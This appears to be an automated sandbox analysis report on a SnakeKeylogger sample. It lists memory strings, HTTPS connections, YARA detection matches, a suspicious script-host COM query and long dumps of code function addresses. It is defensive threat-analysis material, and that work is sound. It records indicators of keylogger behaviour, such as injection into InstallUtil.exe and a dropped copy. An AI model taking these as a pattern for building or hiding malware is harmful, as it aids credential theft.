                      Source: InstallUtil.exe, 00000001.00000002.2570925272.0000000002BE2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002CDD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002B9D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2570925272.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000257A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.0000000002590000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000243A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000247F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1353290642.0000000005430000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1353290642.0000000005430000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1331701274.0000000002971000.00000004.00000800.00020000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003A11000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1463433201.0000000002A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: pbgjw8i8N7.exe, 00000000.00000002.1353290642.0000000005430000.00000004.08000000.00040000.00000000.sdmp, pbgjw8i8N7.exe, 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, XsdType.exe, 00000003.00000002.1478818577.0000000003A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: InstallUtil.exe, 00000001.00000002.2575465092.0000000003C4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                      Source: InstallUtil.exe, 00000001.00000002.2575465092.0000000003C4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2573801314.00000000034EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                      Source: InstallUtil.exe, 00000004.00000002.2569306283.0000000002551000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.00000000024CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                      Source: InstallUtil.exe, 00000001.00000002.2570925272.0000000002CB5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.0000000002551000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
                      Source: InstallUtil.exe, 00000001.00000002.2570925272.0000000002CB0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2569306283.000000000254C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49745 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49753 version: TLS 1.2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 3.2.XsdType.exe.3bbbdb0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 3.2.XsdType.exe.3bbbdb0.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 3.2.XsdType.exe.3bbbdb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 3.2.XsdType.exe.3bbbdb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.2.pbgjw8i8N7.exe.3acd590.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.pbgjw8i8N7.exe.3acd590.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 0.2.pbgjw8i8N7.exe.3b1bdb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 0.2.pbgjw8i8N7.exe.3b1bdb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                      Source: 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: pbgjw8i8N7.exe PID: 1988, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: InstallUtil.exe PID: 8068, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Source: Process Memory Space: XsdType.exe PID: 6732, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                      Windows Scripting host queries suspicious COM object (likely to drop second stage)
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_00EB19300_2_00EB1930
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_00EB19210_2_00EB1921
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_00EB2BA10_2_00EB2BA1
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_00EB1BB00_2_00EB1BB0
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_00EB1B4D0_2_00EB1B4D
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_00EB1C060_2_00EB1C06
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_00EB26180_2_00EB2618
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_00EB26130_2_00EB2613
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_04E9956B0_2_04E9956B
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_04E956600_2_04E95660
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_04E9F8500_2_04E9F850
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_04E97BF70_2_04E97BF7
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_04E91C480_2_04E91C48
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_04E91C390_2_04E91C39
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_04E956500_2_04E95650
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_04E9DB6F0_2_04E9DB6F
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_04FF2B480_2_04FF2B48
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_04FF2B0C0_2_04FF2B0C
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_051271180_2_05127118
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_0512710A0_2_0512710A
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_0512E9B00_2_0512E9B0
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_051277CF0_2_051277CF
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_05120A5F0_2_05120A5F
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_05120A700_2_05120A70
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_051E1A900_2_051E1A90
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_051E1DBF0_2_051E1DBF
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_051E1DF90_2_051E1DF9
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_051E16300_2_051E1630
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_051E16220_2_051E1622
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_051E1E830_2_051E1E83
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_051E1EC20_2_051E1EC2
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_051E49B80_2_051E49B8
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_051E00060_2_051E0006
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_051E00400_2_051E0040
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_051E1B780_2_051E1B78
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_051E1B6C0_2_051E1B6C
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_051E1BA70_2_051E1BA7
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_051E33A00_2_051E33A0
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_051E1BEC0_2_051E1BEC
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_051E1A800_2_051E1A80
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_051E1AFB0_2_051E1AFB
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_052500400_2_05250040
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_0525BB200_2_0525BB20
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_052524600_2_05252460
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_052524500_2_05252450
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_052538A80_2_052538A8
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_052538980_2_05253898
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_0525BB100_2_0525BB10
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_0526A0F80_2_0526A0F8
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_0542A7580_2_0542A758
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_054203D50_2_054203D5
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_0542DAC00_2_0542DAC0
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_05429AEC0_2_05429AEC
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_054274000_2_05427400
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_0542A7490_2_0542A749
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_054200400_2_05420040
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_054200060_2_05420006
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_0542F0B80_2_0542F0B8
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_054273F00_2_054273F0
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_0542DDE70_2_0542DDE7
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_054CE1200_2_054CE120
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_054B00400_2_054B0040
                      Source: C:\Users\user\Desktop\pbgjw8i8N7.exeCode function: 0_2_054B00060_2_054B0006
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_00CE29441_2_00CE2944
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_00CE32D01_2_00CE32D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_00CE42701_2_00CE4270
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_00CE29381_2_00CE2938
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_00CEEE281_2_00CEEE28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_00CE1DF81_2_00CE1DF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_00CE1E081_2_00CE1E08
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_028DD2781_2_028DD278
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_028D53601_2_028D5360
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_028DA0881_2_028DA088
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_028DC1461_2_028DC146
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_028DC7381_2_028DC738
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_028DC4681_2_028DC468
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_028DCA081_2_028DCA08
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_028DE9881_2_028DE988
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_028D69A01_2_028D69A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_028DCFA91_2_028DCFA9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_028D6FC81_2_028D6FC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_028DCCD81_2_028DCCD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_028DFAC11_2_028DFAC1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_028D39ED1_2_028D39ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_028D29EC1_2_028D29EC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_028DE97B1_2_028DE97B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_028D3E091_2_028D3E09
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064B26101_2_064B2610
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064B8FE81_2_064B8FE8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064B18501_2_064B1850
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064B4CE81_2_064B4CE8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064B99301_2_064B9930
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064B26001_2_064B2600
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064BF6191_2_064BF619
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064BD6291_2_064BD629
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064BF6281_2_064BF628
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064BD6381_2_064BD638
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064BDAC81_2_064BDAC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064BFAA91_2_064BFAA9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064BDAB91_2_064BDAB9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064BFAB81_2_064BFAB8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064BDF491_2_064BDF49
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064BDF581_2_064BDF58
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064B97101_2_064B9710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064B0B201_2_064B0B20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064B0B301_2_064B0B30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064B8FD81_2_064B8FD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064BE3D81_2_064BE3D8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064BE3E81_2_064BE3E8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064B18411_2_064B1841
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064B00401_2_064B0040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064B88501_2_064B8850
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064BE8681_2_064BE868
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064B88601_2_064B8860
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064BE8781_2_064BE878
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064B003F1_2_064B003F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064B4CDE1_2_064B4CDE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064BECF81_2_064BECF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064BED081_2_064BED08
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064BF1881_2_064BF188
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064BF1981_2_064BF198
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064BD1981_2_064BD198
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_064BD1A81_2_064BD1A8
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_00E019303_2_00E01930
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_00E019213_2_00E01921
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_00E02BA23_2_00E02BA2
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_00E01BB03_2_00E01BB0
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_00E01B4D3_2_00E01B4D
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_00E01C063_2_00E01C06
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_00E026133_2_00E02613
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_00E026183_2_00E02618
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_0506956B3_2_0506956B
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_050656603_2_05065660
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_0506F8503_2_0506F850
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_05067BF73_2_05067BF7
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_05061C393_2_05061C39
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_05061C483_2_05061C48
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_0506DB6F3_2_0506DB6F
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_051B71183_2_051B7118
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_051B710A3_2_051B710A
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_051BE9B03_2_051BE9B0
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_051B77CF3_2_051B77CF
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_051B0A5F3_2_051B0A5F
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_051B0A703_2_051B0A70
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_05271A903_2_05271A90
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_05271DBF3_2_05271DBF
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_05271DF93_2_05271DF9
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_052716223_2_05271622
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_052716303_2_05271630
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_05271E833_2_05271E83
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_05271EC23_2_05271EC2
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_052749B83_2_052749B8
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_052700063_2_05270006
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_052700403_2_05270040
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_05271B6C3_2_05271B6C
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_05271B783_2_05271B78
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_05271BA73_2_05271BA7
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_052733A03_2_052733A0
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_05271BEC3_2_05271BEC
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_05271A803_2_05271A80
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_05271AFB3_2_05271AFB
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_052E00403_2_052E0040
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_052E24603_2_052E2460
                      Source: C:\Users\user\AppData\Roaming\XsdType.exeCode function: 3_2_052E24503_2_052E2450
